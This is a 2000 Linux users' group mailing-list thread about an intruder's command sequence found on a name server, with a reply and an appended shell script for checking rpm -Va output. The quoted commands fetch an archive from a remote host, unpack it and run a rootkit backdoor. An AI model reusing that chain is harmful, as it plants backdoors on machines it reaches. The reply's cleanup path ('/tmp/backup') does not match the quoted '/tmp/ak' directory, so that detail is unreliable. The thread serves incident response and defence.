[lug] What does this mean?
Tkil
tkil at scrye.com
Mon Mar 20 23:29:54 MST 2000
>>>>> "Shannon" == nunar <nunar at mauromedia.net> writes:
[reformatted for sanity]
Shannon> I was going through my name server and somebody had entered this:
Shannon> # cd /tmp; \
Shannon> rcp disaus at linux7.europop.de:/dev/sdd0 ak.tgz; \
Shannon> echo "* downloaded "; \
Shannon> tar xfz ak*; \
Shannon> cd ak; \
Shannon> ./backdoor/ls; \
Shannon> cd ..; \
Shannon> rm -rf ak*; \
Shannon> exit
note that the only line which actually looks dangerous is the
"./backdoor/ls" one; everything else should be pretty polite.
(although, if they already have root... ouch.)
Shannon> Does anybody know what this is doing to my system?
short version: someone tried to run a rootkit against your box. i
can't tell offhand whether or not they succeeded, but you should
probably "rm -rf /tmp/backup" at the very least.
jafo says: if you are running redhat, check the MD5 sums of all the
packages on the box (this is an option to 'rpm'; consult the man page,
but "--verify" should be close...)
jafo also says: consult the most excellent linux security howto. (hi
kev!) accessible at:
http://www.tummy.com/security-howto/
prepare to do a backup of important data (e.g. your named config
files) and possibly do a full reinstall. be absolutely sure you are
running the latest versions of named and friends (BIND-*). also,
don't do a blind copy of the named config files; double-check that
nobody is using your server who shouldn't be.
t.
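A worked version of the "rpm --verify" check jafo suggests, added here as an example rather than anything from the original thread. It assumes the classic `rpm -V` line format (a flag block such as `S.5....T.` where `S`=size, `M`=mode, `5`=MD5 changed and `.`=unchanged, an optional attribute letter such as `c` for config files, then the path; missing files print as `missing`), and it runs here on constructed sample output. On a live box you would pipe `rpm -Va` into it instead.

```shell
#!/bin/sh
# Added example, not code from the original post. Filters `rpm -Va`
# output down to what a rootkit would typically touch: non-config
# files whose MD5, size or mode changed, plus files that are missing.
# Config files ('c') are skipped because they legitimately differ.

# Constructed sample of `rpm -Va` output for the demonstration.
SAMPLE_RPM_VERIFY='S.5....T.    /bin/ls
.......T.  c /etc/named.conf
S.5....T.  c /etc/passwd
missing     /usr/sbin/named
.M.......    /bin/ps
S.5....T.    /usr/bin/netstat'

# suspicious_rpm_files: reads rpm -Va lines on stdin, prints one line
# per suspicious file, "MODIFIED <flags> <path>" or "MISSING  <path>".
suspicious_rpm_files() {
    set -f                       # no globbing while word-splitting paths
    while read -r line; do
        [ -z "$line" ] && continue
        # Word-split into: flags, optional attribute letter, path.
        set -- $line
        flags=$1
        if [ $# -eq 3 ]; then attr=$2; path=$3; else attr=""; path=$2; fi
        if [ "$flags" = "missing" ]; then
            echo "MISSING  $path"
            continue
        fi
        # Config files are expected to differ from the package copy.
        [ "$attr" = "c" ] && continue
        case "$flags" in
            *5*|S*|?M*) echo "MODIFIED $flags $path" ;;
        esac
    done
    set +f
}

# check_sample: runs the filter over the constructed sample above.
# On a real system: rpm -Va | suspicious_rpm_files
check_sample() {
    printf '%s\n' "$SAMPLE_RPM_VERIFY" | suspicious_rpm_files
}

check_sample
```

The caveat a practitioner would add: a rootkit that replaces `ls` and `ps` may also have replaced `rpm` or the files it compares against, so run the check from a rescue boot or with a known-good `rpm` binary, and compare the verify output against the vendor's package signatures, not only the local database. The quoted script unpacks its archive under /tmp (the `ak` directory) and deletes it afterwards, so an empty /tmp proves nothing by itself.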